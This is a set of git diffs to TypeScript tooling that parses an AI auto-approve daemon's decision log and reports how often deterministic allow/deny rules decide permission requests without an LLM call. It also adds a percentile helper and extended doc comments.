+ *  every other field `undefined` -- `parseDecisionLog` then either ignores
+ *  the line or counts it under `autoApproveNonDecision` (see that doc). */
 export interface ParsedLogLine {
   readonly raw: string;
   readonly matched: boolean;
@@ -446,10 +460,9 @@ function unmatchedLine(raw: string): ParsedLogLine {
 /**
  * Parses one line of `auto-approve-service.ts`'s `logFn` output. Templates
  * read from source (this file's module doc), not guessed. Never throws on
- * an unrecognized line -- returns `{matched: false, ...}` instead, so a line
- * from a future log format, or ordinary non-decision daemon output mixed
- * into the same file, is counted as `unparsed` by `parseDecisionLog` rather
- * than crashing the report.
+ * an unrecognized line -- returns `{matched: false, ...}` instead; what
+ * `parseDecisionLog` does with a non-match depends on whether the line is
+ * `[AutoApprove`-tagged at all (see its doc).
  */
 function parseLine(raw: string): ParsedLogLine {
   const m2 = FAMILY2_RE.exec(raw);
@@ -500,7 +513,18 @@ function parseLine(raw: string): ParsedLogLine {
 
 export interface DecisionLogTally {
   readonly totalLines: number;
-  readonly unparsed: number;
+  /**
+   * `[AutoApprove`-tagged lines that matched no DECISION shape. Mostly the
+   * service's lifecycle lines (`Externally resolved`, `Parked subagent
+   * prompt`, `Releasing N held hook(s)`, `Held hook ... resolved`), which are
+   * real AutoApprove output this report deliberately does not tally -- but a
+   * decision line from a future log format lands here too, so a sudden jump
+   * in this count against a similar decision count is the drift signal.
+   * Lines with no `[AutoApprove` tag at all (the rest of the daemon's log)
+   * are ignored entirely: counting them as "unparsed" made a healthy report
+   * read as 98% parser failure (28489 of 28921 on the first real run).
+   */
+  readonly autoApproveNonDecision: number;
   readonly fastPathCount: number;
   readonly llmPathCount: number;
   readonly byVerdict: Readonly<Record<LogVerdict, number>>;
@@ -527,8 +551,11 @@ function emptyVerdictLatencies(): Record<LogVerdict, number[]> {
 /**
  * Parses a `remi.log` (or any text carrying `[AutoApprove ...]` decision
  * lines mixed with other daemon output) into per-verdict/band/layer counts
- * and latency samples. No printing here -- percentile computation and
- * rendering are `run-approval-rate-report.ts`'s job.
+ * and latency samples. Lines without an `[AutoApprove` tag are ignored;
+ * tagged lines that match no decision shape are counted as
+ * `autoApproveNonDecision` (see that field's doc for why the split exists).
+ * No printing here -- percentile computation and rendering are
+ * `run-approval-rate-report.ts`'s job.
  */
 export function parseDecisionLog(text: string): ParsedDecisionLog {
   const lines = text.split('\n').filter((line) => line.trim().length > 0);
@@ -537,7 +564,7 @@ export function parseDecisionLog(text: string): ParsedDecisionLog {
   const byVerdict = emptyVerdictCounts();
   const latenciesByVerdict = emptyVerdictLatencies();
   const byVerdictBandDecidedBy: Record<string, number> = {};
-  let unparsed = 0;
+  let autoApproveNonDecision = 0;
   let fastPathCount = 0;
   let llmPathCount = 0;
   let queueTimeoutCount = 0;
@@ -545,7 +572,7 @@ export function parseDecisionLog(text: string): ParsedDecisionLog {
 
   for (const line of parsedLines) {
     if (!line.matched || line.verdict === undefined) {
-      unparsed += 1;
+      if (line.raw.includes('[AutoApprove')) autoApproveNonDecision += 1;
       continue;
     }
     byVerdict[line.verdict] += 1;
@@ -563,7 +590,7 @@ export function parseDecisionLog(text: string): ParsedDecisionLog {
   return {
     tally: {
       totalLines: parsedLines.length,
-      unparsed,
+      autoApproveNonDecision,
       fastPathCount,
       llmPathCount,
       byVerdict,

--- a/packages/daemon/tests/auto-approve/approval-rate.ts
+++ b/packages/daemon/tests/auto-approve/approval-rate.ts
@@ -9,7 +9,7 @@
  * runner, and this keeps the two consumers importing the exact same code
  * path rather than the CLI re-deriving anything.
  *
- * Four independent units, each documented at its own definition below:
+ * Five independent units, each documented at its own definition below:
  *
  *   - `loadCorpusRecords` -- JSONL -> `PermissionRequest` records. Same
  *     shape as `guard-chain-replay.test.ts`'s local loader, generalized to
@@ -23,6 +23,9 @@
  *   - `parseDecisionLog` -- parses `auto-approve-service.ts`'s own `logFn`
  *     output (the exact templates it writes, read from source, not
  *     reimplemented logic) into verdict/band/layer counts and latencies.
+ *   - `percentile` -- nearest-rank (ceil) percentile over a latency sample,
+ *     shared so both the CLI and this file's own tests exercise the exact
+ *     same rank math.
  *
  * NO MOCKS (repo rule): every unit here either calls a real exported
  * function (`evaluateDeterministic`, `classifyRisk`, `maskQuotedSpans`,
@@ -69,7 +72,7 @@ export interface CorpusRecord {
  * unrelated line must not fail the whole replay.
  *
  * Mirrors `guard-chain-replay.test.ts`'s `loadLocalCorpusReplayRecords`
- * (that file's :385-407) -- same filter, same skip-on-malformed posture,
+ * (that file's :385-408) -- same filter, same skip-on-malformed posture,
  * generalized to take a path (that file's version is hardcoded to the one
  * fixture) and to carry `agent_type` through (ADR 0025 per-agent-type
  * policy needs it; the guard chain this mirrors does not).
@@ -89,9 +92,10 @@ export function loadCorpusRecords(
   eventName = 'PermissionRequest',
 ): CorpusRecord[] {
   const raw = fs.readFileSync(filePath, 'utf8');
-  const lines = raw.split('\n').filter((line) => line.trim().length > 0);
+  const lines = raw.split('\n');
   const records: CorpusRecord[] = [];
   lines.forEach((line, i) => {
+    if (line.trim().length === 0) return;
     let parsed: Record<string, unknown>;
     try {
       parsed = JSON.parse(line) as Record<string, unknown>;
@@ -143,6 +147,15 @@ export interface ReplayTally {
   readonly total: number;
   readonly approve: number;
   readonly approveBySource: { readonly allow: number; readonly group: number };
+  /** Matched the user's own `deny`/`deny_groups`. A no-LLM outcome ONLY for
+   *  MAIN-context traffic -- `evaluate()` returns `deny` immediately at 0ms
+   *  for those. For an agent-tagged record it is NOT: the gate's hook-time
+   *  path (ADR 0004) short-circuits before the LLM only on a deterministic
+   *  APPROVE, and a config-level deny for an agent-tagged request instead
+   *  PARKS for render-time arbitration, which may still reach the LLM if the
+   *  prompt renders. So "deny-covered" does not mean "decided with no LLM
+   *  call" for every record this tally counts it against -- only for the
+   *  ones with no `agentType`. */
   readonly denyCovered: number;
   readonly denyCoveredBySource: { readonly pattern: number; readonly group: number };
   /** Nothing deterministic decided it -- what would reach the LLM in a live
@@ -201,6 +214,11 @@ function ensureToolTally(
  * decided it -- would reach the LLM in a live `evaluate()` call) is
  * additionally banded with `classifyRisk`, so the residual's RISK, not just
  * its size, is visible.
+ *
+ * See `ReplayTally.denyCovered`'s own doc for why a `deny-covered` verdict
+ * is a no-LLM outcome for MAIN-context traffic only -- an agent-tagged
+ * record hitting the same config deny instead parks for render-time
+ * arbitration (ADR 0004) and may still reach the LLM.
  */
 export function replayDeterministic(
   records: readonly CorpusRecord[],
@@ -362,7 +380,24 @@ function hasHeredocOperator(masked: string): boolean {
  * this bucket. Narrower than the plan's "redirection" name might suggest;
  * stated here rather than left for a reader to discover missing.
  *
- * REPORT-ONLY. Never imported by `src/` -- `permission-groups.ts` and
+ * The gap above is under-matching; this classifier also OVER-matches, in
+ * three verified ways -- all report-only mislabels, not decision-path bugs:
+ *
+ *   - `REDIRECT_CLAUSE_RE` (`\d*>>?\s*&?\S+`) has no lookbehind, so it
+ *     matches the `->` in `make build -> dist` as a redirect onto `dist`;
+ *     that `>` is the second character of an arrow, not shell syntax.
+ *   - `hasHeredocOperator` matches `<<` wherever it appears, so
+ *     `$((1 << 3))` (a plain arithmetic left shift) grades `heredoc`, not
+ *     `single`.
+ *   - When `maskQuotedSpans` fails closed on an unterminated quote (its own
+ *     doc: "a quote that never closes ... returns the segment UNCHANGED"),
+ *     the raw, unmasked text is what both checks above scan --
+ *     `echo 'unterminated << here` (no closing `'`) grades `heredoc` off the
+ *     literal `<<` inside what was meant to be a quoted string.
+ *
+ * All three are acceptable precisely because this classifier is
+ * REPORT-ONLY: err-broad here costs a mislabeled report row, never a wrong
+ * permission decision. Never imported by `src/` -- `permission-groups.ts` and
  * `shell-safety.ts` already decide coverage; this classifier exists purely
  * to explain, after the fact, WHY a command missed it, and folding an
  * explanatory classification into the decision path is exactly the kind of
@@ -398,13 +433,17 @@ export interface ParsedLogLine {
   readonly authorityPresent: boolean | undefined;
   readonly decidedBy: DecidingLayer | undefined;
   readonly reasoning: string | undefined;
-  /** True for every shape that never reached the LLM: the deterministic
-   *  DENIED/approve lines, the pre-LLM PRECEDENT shortcut, the
-   *  always-escalate design/multichoice/index-mismatch/queue-timeout lines,
-   *  CANCELLED, ERROR. False only for the post-LLM line (the one carrying
-   *  the `[band=...]` bracket `formatMatrixContext` produces) -- every
-   *  earlier `return` in `evaluate()` logs its own line first and never
-   *  reaches that call. */
+  /** True for every shape that never produced a model verdict. The
+   *  deterministic DENIED/approve lines, the pre-LLM PRECEDENT shortcut, and
+   *  the always-escalate design/multichoice/index-mismatch/queue-timeout
+   *  lines are genuinely pre-LLM: no `chatCompletion` call was ever made.
+   *  CANCELLED and ERROR are also `fastPath: true` but are NOT pre-LLM --
+   *  both are logged from the `catch` block AFTER a real LLM dispatch
+   *  (CANCELLED aborts an in-flight `chatCompletion`; ERROR is dominated by
+   *  the 30s LLM timeout) -- they simply never got a parsed verdict back.
+   *  False only for the post-LLM line (the one carrying the `[band=...]`
+   *  bracket `formatMatrixContext` produces) -- every earlier `return` in
+   *  `evaluate()` logs its own line first and never reaches that call. */
   readonly fastPath: boolean;
   /** Reasoning contains "eval queue wait exceeded" -- `evaluate()`'s
    *  `acquireSlot` timeout path (#551). */
@@ -514,15 +553,35 @@ function parseLine(raw: string): ParsedLogLine {
 export interface DecisionLogTally {
   readonly totalLines: number;
   /**
-   * `[AutoApprove`-tagged lines that matched no DECISION shape. Mostly the
-   * service's lifecycle lines (`Externally resolved`, `Parked subagent
-   * prompt`, `Releasing N held hook(s)`, `Held hook ... resolved`), which are
-   * real AutoApprove output this report deliberately does not tally -- but a
-   * decision line from a future log format lands here too, so a sudden jump
-   * in this count against a similar decision count is the drift signal.
-   * Lines with no `[AutoApprove` tag at all (the rest of the daemon's log)
-   * are ignored entirely: counting them as "unparsed" made a healthy report
-   * read as 98% parser failure (28489 of 28921 on the first real run).
+   * `[AutoApprove`-tagged lines that matched no DECISION shape. Two
+   * deliberate populations land here BY DESIGN, plus one known gap in the
+   * current format:
+   *
+   * - Lifecycle lines, logged by `auto-approve-gate.ts` (NOT the service):
+   *   `Externally resolved`, `Parked subagent prompt`, `Releasing N held
+   *   hook(s)`, `Held hook ... resolved`.
+   * - Seven guard/sideband lines the SERVICE emits unconditionally --
+   *   proportional to decision volume, never gated on `log_decisions`:
+   *   DENY FLOOR (auto-approve-service.ts:1102), TRUST BOUNDARY (:1129),
+   *   RISK CEILING (:1165), PRECEDENT approve->escalate (:1205), the two
+   *   COUNTERFACTUAL shapes (:1258 overridden, :1278 check-failed), and the
+   *   PRECEDENT band-refusal fall-through (:883). Each of these fires
+   *   ALONGSIDE, never instead of, the :1295 post-LLM matrix line that
+   *   carries the actual decision -- dropping them here is what prevents
+   *   double-counting a single verdict as two.
+   * - KNOWN CURRENT-FORMAT EXCLUSION: with `multichoice = 'evaluate'`
+   *   (default `'skip'`, config.ts:454) a post-LLM `pick` verdict is logged
+   *   through the same :1295 call and carries the same `[band=...]`
+   *   bracket as approve/deny/escalate, but `FAMILY2_RE`'s verdict group
+   *   only matches `approve|deny|escalate`, so a real `pick` decision lands
+   *   here too, not in `byVerdict`.
+   *
+   * A decision line from a future log format also lands here, so a sudden
+   * jump in this count against a similar decision count is the drift
+   * signal. Lines with no `[AutoApprove` tag at all (the rest of the
+   * daemon's log) are ignored entirely: counting them as "unparsed" made a
+   * healthy report read as 98% parser failure (28489 of 28921 on the first
+   * real run).
    */
   readonly autoApproveNonDecision: number;
   readonly fastPathCount: number;
@@ -554,8 +613,18 @@ function emptyVerdictLatencies(): Record<LogVerdict, number[]> {
  * and latency samples. Lines without an `[AutoApprove` tag are ignored;
  * tagged lines that match no decision shape are counted as
  * `autoApproveNonDecision` (see that field's doc for why the split exists).
- * No printing here -- percentile computation and rendering are
- * `run-approval-rate-report.ts`'s job.
+ * No printing here -- this module's `percentile()` and the rendering that
+ * consumes it are `run-approval-rate-report.ts`'s job.
+ *
+ * Gated on `log_decisions` (default `true`, config.ts:415): the post-LLM
+ * matrix line (auto-approve-service.ts:1295), the deterministic-approve line
+ * (:830), and the multichoice-skip escalate (:912) are each wrapped in
+ * `if (this.logDecisions)` and simply do not exist in the log when that
+ * setting is off. On a log captured from a `log_decisions = false` machine,
+ * `llmPathCount` is exactly 0 and the verdict counts collapse to whatever
+ * the unconditional guard/sideband lines (see `autoApproveNonDecision`'s
+ * doc) and CANCELLED/ERROR contribute -- this parser has no way to
+ * distinguish that from a machine that is genuinely quiet.
  */
 export function parseDecisionLog(text: string): ParsedDecisionLog {
   const lines = text.split('\n').filter((line) => line.trim().length > 0);
@@ -601,4 +670,21 @@ export function parseDecisionLog(text: string): ParsedDecisionLog {
     },
     lines: parsedLines,
   };
+}
+
+// ---------------------------------------------------------------------------
+// (e) percentile
+// ---------------------------------------------------------------------------
+
+/** Nearest-rank percentile (ceil, not floor): for a 2-sample array, `p50`
+ *  lands on the lower value and `p95` on the upper one, matching what a
+ *  reader expects a median of two samples to mean. A floor-based index
+ *  instead picks the UPPER value for `p50` at every even small `n` --
+ *  technically a valid discrete-percentile convention, but confusing in a
+ *  report meant to be read directly. */
+export function percentile(values: readonly number[], p: number): number | null {
+  if (values.length === 0) return null;
+  const sorted = [...values].sort((a, b) => a - b);
+  const idx = Math.min(sorted.length - 1, Math.max(0, Math.ceil((p / 100) * sorted.length) - 1));
+  return sorted[idx] ?? null;
 }

--- a/packages/daemon/tests/auto-approve/run-approval-rate-report.ts
+++ b/packages/daemon/tests/auto-approve/run-approval-rate-report.ts
@@ -1,0 +1,466 @@
+#!/usr/bin/env bun
+/**
+ * Phase 1 approval-rate report (epic #1057, closes #992): how much of a real
+ * `PermissionRequest` corpus the DETERMINISTIC layers (`allow`/`deny`/
+ * `approve_groups`/`deny_groups`, #1024's `evaluateDeterministic`) already
+ * decide with no LLM call, what shape the misses have, and -- given a live
+ * `remi.log` -- how the LLM path itself is actually behaving. Not a
+ * `bun:test` file; run directly with `bun run`.
+ *
+ * Usage:
+ *   bun packages/daemon/tests/auto-approve/run-approval-rate-report.ts \
+ *     [--input <path>] [--config <path>] [--level strict|balanced|trusted] \
+ *     [--log <path>] [--unique] [--json]
+ *
+ * Flags:
+ *   --input <path>   JSONL corpus to replay (`loadCorpusRecords`). Default:
+ *                     fixtures/.local-command-corpus.jsonl next to this
+ *                     script (gitignored, developer-generated -- see
+ *                     `build-hook-corpus.ts --mode structure-preserving`).
+ *   --config <path>  `config.toml` to load `[auto_approve]` from. Default:
+ *                     `~/.remi/config.toml` (same default `loadConfig` uses).
+ *   --level <name>   Overrides the resolved config's `approve_groups` with
+ *                     `groupsForLevel(<name>)` -- lets one config be swept
+ *                     across all three strictness presets without editing it.
+ *   --log <path>     A `remi.log` (or any text carrying `[AutoApprove ...]`
+ *                     lines) to additionally run through `parseDecisionLog`.
+ *                     Omitted: the log section is skipped entirely.
+ *   --unique         Dedupe `Bash` records by exact command string before
+ *                     replay (`replayDeterministic`'s own option).
+ *   --json           Print one JSON object instead of tables. The table and
+ *                     JSON renderers consume the exact same computed
+ *                     `Report`, so the two can never disagree with each
+ *                     other about a number.
+ *
+ * Exits non-zero only on a real error (input file missing, config/log
+ * unreadable, invalid `--level`) -- an empty-but-present corpus is not an
+ * error and reports as all-zero.
+ */
+
+import * as fs from 'node:fs';
+import * as os from 'node:os';
+import * as path from 'node:path';
+import { errorToString } from '@remi/shared';
+import {
+  AUTO_APPROVE_LEVELS,
+  groupsForLevel,
+  isAutoApproveLevel,
+} from '../../src/auto-approve/levels.ts';
+import type { AutoApproveLevel } from '../../src/auto-approve/levels.ts';
+import { RISK_BANDS } from '../../src/auto-approve/risk-bands.ts';
+import type { RiskBand } from '../../src/auto-approve/risk-bands.ts';
+import type { AutoApproveConfig } from '../../src/auto-approve/types.ts';
+import { CONFIG_PATH, applyEnvOverrides, loadConfig } from '../../src/config/config.ts';
+import {
+  type CorpusRecord,
+  type LogVerdict,
+  type MissBucket,
+  type ReplayResult,
+  type ReplayTally,
+  classifyMiss,
+  loadCorpusRecords,
+  parseDecisionLog,
+  replayDeterministic,
+} from './approval-rate.ts';
+
+// ---------------------------------------------------------------------------
+// argv
+// ---------------------------------------------------------------------------
+
+function argValue(flag: string): string | undefined {
+  const idx = process.argv.indexOf(flag);
+  if (idx === -1) return undefined;
+  return process.argv[idx + 1];
+}
+
+function expandHome(p: string): string {
+  if (p === '~') return os.homedir();
+  if (p.startsWith('~/')) return path.join(os.homedir(), p.slice(2));
+  return p;
+}
+
+const DEFAULT_INPUT_PATH = path.join(import.meta.dir, 'fixtures', '.local-command-corpus.jsonl');
+
+const inputPath = expandHome(argValue('--input') ?? DEFAULT_INPUT_PATH);
+const configPath = expandHome(argValue('--config') ?? CONFIG_PATH);
+const logPathArg = argValue('--log');
+const logPath = logPathArg !== undefined ? expandHome(logPathArg) : undefined;
+const uniqueFlag = process.argv.includes('--unique');
+const jsonFlag = process.argv.includes('--json');
+
+const levelArg = argValue('--level');
+if (levelArg !== undefined && !isAutoApproveLevel(levelArg)) {
+  console.error(
+    `[approval-rate] Invalid --level "${levelArg}". Valid levels: ${AUTO_APPROVE_LEVELS.join(', ')}`,
+  );
+  process.exit(1);
+}
+const levelOverride: AutoApproveLevel | undefined = levelArg as AutoApproveLevel | undefined;
+
+// ---------------------------------------------------------------------------
+// Report shape -- built once, consumed by BOTH the JSON and table renderers
+// so the two can never disagree about a number.
+// ---------------------------------------------------------------------------
+
+interface ProvenanceInfo {
+  readonly date: string;
+  readonly inputPath: string;
+  readonly rawRecordCount: number;
+  readonly effectiveRecordCount: number;
+  readonly unique: boolean;
+  readonly configPath: string;
+  readonly configFound: boolean;
+  readonly resolvedLevel: AutoApproveLevel;
+  readonly resolvedApproveGroups: readonly string[];
+  readonly logPath: string | undefined;
+}
+
+interface ToolCoverage {
+  readonly total: number;
+  readonly approve: number;
+  readonly denyCovered: number;
+  readonly residual: number;
+  readonly coveragePct: number;
+}
+
+interface CoverageReport {
+  readonly total: number;
+  readonly approve: number;
+  readonly approveBySource: { readonly allow: number; readonly group: number };
+  readonly denyCovered: number;
+  readonly denyCoveredBySource: { readonly pattern: number; readonly group: number };
+  readonly residual: number;
+  readonly coveragePct: number;
+  readonly perTool: Readonly<Record<string, ToolCoverage>>;
+}
+
+interface MissBucketStats {
+  readonly count: number;
+  readonly byBand: Readonly<Record<RiskBand, number>>;
+}
+
+interface MissReport {
+  readonly buckets: Readonly<Record<MissBucket, MissBucketStats>>;
+  /** Residual records `classifyMiss` cannot bucket: not `Bash`, or a `Bash`
+   *  record with no string `command`. */
+  readonly unclassifiable: number;
+}
+
+interface BandReport {
+  readonly total: number;
+  readonly byBand: Readonly<Record<RiskBand, number>>;
+}
+
+interface LatencyStats {
+  readonly count: number;
+  readonly p50: number | null;
+  readonly p95: number | null;
+}
+
+interface LogReport {
+  readonly totalLines: number;
+  readonly unparsed: number;
+  readonly fastPathCount: number;
+  readonly llmPathCount: number;
+  readonly byVerdict: Readonly<Record<LogVerdict, number>>;
+  readonly byVerdictBandDecidedBy: Readonly<Record<string, number>>;
+  readonly latencyByVerdict: Readonly<Record<LogVerdict, LatencyStats>>;
+  readonly queueTimeoutCount: number;
+  readonly riskCeilingCount: number;
+}
+
+interface Report {
+  readonly provenance: ProvenanceInfo;
+  readonly coverage: CoverageReport;
+  readonly misses: MissReport;
+  readonly residualBand: BandReport;
+  readonly log: LogReport | undefined;
+}
+
+// ---------------------------------------------------------------------------
+// Report builders
+// ---------------------------------------------------------------------------
+
+function emptyBandCounts(): Record<RiskBand, number> {
+  return { low: 0, moderate: 0, high: 0, critical: 0 };
+}
+
+function pctOf(n: number, total: number): number {
+  return total === 0 ? 0 : (n / total) * 100;
+}
+
+function buildCoverageReport(tally: ReplayTally): CoverageReport {
+  const perTool: Record<string, ToolCoverage> = {};
+  for (const [tool, t] of Object.entries(tally.perTool)) {
+    perTool[tool] = {
+      total: t.total,
+      approve: t.approve,
+      denyCovered: t.denyCovered,
+      residual: t.residual,
+      coveragePct: pctOf(t.approve + t.denyCovered, t.total),
+    };
+  }
+  return {
+    total: tally.total,
+    approve: tally.approve,
+    approveBySource: tally.approveBySource,
+    denyCovered: tally.denyCovered,
+    denyCoveredBySource: tally.denyCoveredBySource,
+    residual: tally.residual,
+    coveragePct: pctOf(tally.approve + tally.denyCovered, tally.total),
+    perTool,
+  };
+}
+
+const MISS_BUCKETS: readonly MissBucket[] = [
+  'heredoc',
+  'redirection',
+  'pipeline',
+  'chained',
+  'single',
+];
+
+function buildMissReport(
+  replay: ReplayResult,
+  recordsByIndex: ReadonlyMap<number, CorpusRecord>,
+): MissReport {
+  const buckets: Record<MissBucket, { count: number; byBand: Record<RiskBand, number> }> = {
+    heredoc: { count: 0, byBand: emptyBandCounts() },
+    redirection: { count: 0, byBand: emptyBandCounts() },
+    pipeline: { count: 0, byBand: emptyBandCounts() },
+    chained: { count: 0, byBand: emptyBandCounts() },
+    single: { count: 0, byBand: emptyBandCounts() },
+  };
+  let unclassifiable = 0;
+
+  for (const record of replay.records) {
+    if (record.decision !== null) continue;
+    if (record.toolName !== 'Bash') {
+      unclassifiable += 1;
+      continue;
+    }
+    const original = recordsByIndex.get(record.index);
+    const command = original?.toolInput['command'];
+    if (typeof command !== 'string') {
+      unclassifiable += 1;
+      continue;
+    }
+    const bucket = classifyMiss(command);
+    buckets[bucket].count += 1;
+    if (record.band !== undefined) buckets[bucket].byBand[record.band] += 1;
+  }
+
+  return { buckets, unclassifiable };
+}
+
+function buildBandReport(tally: ReplayTally): BandReport {
+  return { total: tally.residual, byBand: tally.residualByBand };
+}
+
+/** Nearest-rank percentile (ceil, not floor): for a 2-sample array, `p50`
+ *  lands on the lower value and `p95` on the upper one, matching what a
+ *  reader expects a median of two samples to mean. A floor-based index
+ *  instead picks the UPPER value for `p50` at every even small `n` --
+ *  technically a valid discrete-percentile convention, but confusing in a
+ *  report meant to be read directly. */
+function percentile(values: readonly number[], p: number): number | null {
+  if (values.length === 0) return null;
+  const sorted = [...values].sort((a, b) => a - b);
+  const idx = Math.min(sorted.length - 1, Math.max(0, Math.ceil((p / 100) * sorted.length) - 1));
+  return sorted[idx] ?? null;
+}
+
+const LOG_VERDICTS: readonly LogVerdict[] = ['approve', 'deny', 'escalate', 'cancelled', 'error'];
+
+function buildLogReport(text: string): LogReport {
+  const { tally } = parseDecisionLog(text);
+  const latencyByVerdict: Record<LogVerdict, LatencyStats> = {
+    approve: { count: 0, p50: null, p95: null },
+    deny: { count: 0, p50: null, p95: null },
+    escalate: { count: 0, p50: null, p95: null },
+    cancelled: { count: 0, p50: null, p95: null },
+    error: { count: 0, p50: null, p95: null },
+  };
+  for (const verdict of LOG_VERDICTS) {
+    const values = tally.latenciesByVerdict[verdict];
+    latencyByVerdict[verdict] = {
+      count: values.length,
+      p50: percentile(values, 50),
+      p95: percentile(values, 95),
+    };
+  }
+  return {
+    totalLines: tally.totalLines,
+    unparsed: tally.unparsed,
+    fastPathCount: tally.fastPathCount,
+    llmPathCount: tally.llmPathCount,
+    byVerdict: tally.byVerdict,
+    byVerdictBandDecidedBy: tally.byVerdictBandDecidedBy,
+    latencyByVerdict,
+    queueTimeoutCount: tally.queueTimeoutCount,
+    riskCeilingCount: tally.riskCeilingCount,
+  };
+}
+
+// ---------------------------------------------------------------------------
+// Table rendering
+// ---------------------------------------------------------------------------
+
+function pct(n: number): string {
+  return `${n.toFixed(1)}%`;
+}
+
+function rule(): void {
+  console.log('='.repeat(88));
+}
+
+function printReport(report: Report): void {
+  console.log('');
+  rule();
+  console.log('  Phase 1 approval-rate report (#992 / #1057)');
+  rule();
+  console.log(`  date:              ${report.provenance.date}`);
+  console.log(`  input:             ${report.provenance.inputPath}`);
+  console.log(
+    `  records:           ${report.provenance.rawRecordCount} raw, ${report.provenance.effectiveRecordCount} replayed${report.provenance.unique ? ' (--unique)' : ''}`,
+  );
+  console.log(
+    `  config:            ${report.provenance.configPath}${report.provenance.configFound ? '' : ' (not found; built-in defaults)'}`,
+  );
+  console.log(`  level:             ${report.provenance.resolvedLevel}`);
+  console.log(
+    `  approve_groups:    ${report.provenance.resolvedApproveGroups.length > 0 ? report.provenance.resolvedApproveGroups.join(', ') : '(none)'}`,
+  );
+  if (report.provenance.logPath !== undefined) {
+    console.log(`  log:               ${report.provenance.logPath}`);
+  }
+  rule();
+
+  console.log('\n(a) Deterministic coverage\n');
+  const c = report.coverage;
+  console.log(
+    `  TOTAL   ${String(c.total).padStart(6)}   approve ${String(c.approve).padStart(5)} (allow ${c.approveBySource.allow}, group ${c.approveBySource.group})   deny-covered ${String(c.denyCovered).padStart(4)} (pattern ${c.denyCoveredBySource.pattern}, group ${c.denyCoveredBySource.group})   residual ${String(c.residual).padStart(5)}   coverage ${pct(c.coveragePct)}`,
+  );
+  console.log('');
+  const toolNames = Object.keys(c.perTool).sort();
+  const toolNameWidth = Math.max(4, ...toolNames.map((t) => t.length));
+  for (const tool of toolNames) {
+    const t = c.perTool[tool];
+    if (!t) continue;
+    console.log(
+      `  ${tool.padEnd(toolNameWidth)}  total ${String(t.total).padStart(5)}  approve ${String(t.approve).padStart(5)}  deny-covered ${String(t.denyCovered).padStart(4)}  residual ${String(t.residual).padStart(5)}  coverage ${pct(t.coveragePct)}`,
+    );
+  }
+
+  console.log('\n(b) Miss classification (residual Bash commands, by shape)\n');
+  for (const bucket of MISS_BUCKETS) {
+    const stats = report.misses.buckets[bucket];
+    const bandStr = RISK_BANDS.map((band) => `${band}=${stats.byBand[band]}`).join(' ');
+    console.log(`  ${bucket.padEnd(11)} ${String(stats.count).padStart(5)}   ${bandStr}`);
+  }
+  console.log(
+    `  ${'unclassifiable'.padEnd(11)} ${String(report.misses.unclassifiable).padStart(5)}   (non-Bash, or no string command)`,
+  );
+
+  console.log('\n(c) Band distribution of the LLM-bound residue\n');
+  for (const band of RISK_BANDS) {
+    const n = report.residualBand.byBand[band];
+    console.log(
+      `  ${band.padEnd(9)} ${String(n).padStart(5)}   ${pct(pctOf(n, report.residualBand.total))}`,
+    );
+  }
+
+  if (report.log !== undefined) {
+    const log = report.log;
+    console.log('\n(d) Live decision log\n');
+    console.log(
+      `  lines: ${log.totalLines}   unparsed: ${log.unparsed}   fast-path: ${log.fastPathCount}   llm-path: ${log.llmPathCount}   queue-timeout: ${log.queueTimeoutCount}   risk-ceiling: ${log.riskCeilingCount}`,
+    );
+    console.log('\n  verdict rates:\n');
+    for (const verdict of LOG_VERDICTS) {
+      const n = log.byVerdict[verdict];
+      const lat = log.latencyByVerdict[verdict];
+      console.log(
+        `  ${verdict.padEnd(10)} ${String(n).padStart(5)}   p50 ${String(lat.p50 ?? '-').padStart(6)}ms   p95 ${String(lat.p95 ?? '-').padStart(6)}ms   (n=${lat.count})`,
+      );
+    }
+    console.log('\n  verdict x band x decided_by:\n');
+    for (const [key, n] of Object.entries(log.byVerdictBandDecidedBy).sort()) {
+      console.log(`  ${key.padEnd(40)} ${String(n).padStart(5)}`);
+    }
+  }
+  console.log('');
+}
+
+// ---------------------------------------------------------------------------
+// Main
+// ---------------------------------------------------------------------------
+
+function resolveAutoApproveConfig(): { config: AutoApproveConfig; configFound: boolean } {
+  const configFound = fs.existsSync(configPath);
+  const loaded = applyEnvOverrides(loadConfig(configPath));
+  if (levelOverride === undefined) {
+    return { config: loaded.auto_approve, configFound };
+  }
+  return {
+    config: {
+      ...loaded.auto_approve,
+      level: levelOverride,
+      approve_groups: groupsForLevel(levelOverride),
+    },
+    configFound,
+  };
+}
+
+function main(): void {
+  if (!fs.existsSync(inputPath)) {
+    console.error(
+      `[approval-rate] No corpus at ${inputPath}. Generate one with:\n  bun run packages/daemon/tests/hooks/fixtures/build-hook-corpus.ts --mode structure-preserving [--input ~/.remi/hook-diag.jsonl]\nor pass --input pointing at an existing JSONL capture.`,
+    );
+    process.exit(1);
+  }
+
+  const rawRecords = loadCorpusRecords(inputPath);
+  const recordsByIndex = new Map(rawRecords.map((r) => [r.index, r] as const));
+  const { config, configFound } = resolveAutoApproveConfig();
+
+  const replay = replayDeterministic(rawRecords, config, { unique: uniqueFlag });
+
+  let log: LogReport | undefined;
+  if (logPath !== undefined) {
+    const text = fs.readFileSync(logPath, 'utf8');
+    log = buildLogReport(text);
+  }
+
+  const report: Report = {
+    provenance: {
+      date: new Date().toISOString(),
+      inputPath,
+      rawRecordCount: rawRecords.length,
+      effectiveRecordCount: replay.tally.total,
+      unique: uniqueFlag,
+      configPath,
+      configFound,
+      resolvedLevel: config.level,
+      resolvedApproveGroups: config.approve_groups,
+      logPath,
+    },
+    coverage: buildCoverageReport(replay.tally),
+    misses: buildMissReport(replay, recordsByIndex),
+    residualBand: buildBandReport(replay.tally),
+    log,
+  };
+
+  if (jsonFlag) {
+    console.log(JSON.stringify(report, null, 2));
+    return;
+  }
+  printReport(report);
+}
+
+try {
+  main();
+} catch (err) {
+  console.error(`[approval-rate] ${errorToString(err)}`);
+  process.exit(1);
+}

--- a/packages/daemon/tests/auto-approve/run-approval-rate-report.ts
+++ b/packages/daemon/tests/auto-approve/run-approval-rate-report.ts
@@ -3,7 +3,13 @@
  * Phase 1 approval-rate report (epic #1057, closes #992): how much of a real
  * `PermissionRequest` corpus the DETERMINISTIC layers (`allow`/`deny`/
  * `approve_groups`/`deny_groups`, #1024's `evaluateDeterministic`) already
- * decide with no LLM call, what shape the misses have, and -- given a live
+ * decide with no LLM call -- for MAIN-context traffic. A `deny-covered`
+ * record whose deterministic verdict came from a config `deny`/`deny_groups`
+ * match is NOT decided with no LLM call when it is agent-tagged: the gate's
+ * hook-time path (ADR 0004) short-circuits before the LLM only on a
+ * deterministic APPROVE, and a config-level deny for an agent-tagged request
+ * instead parks for render-time arbitration, which may still reach the LLM.
+ * This report also shows what shape the misses have, and -- given a live
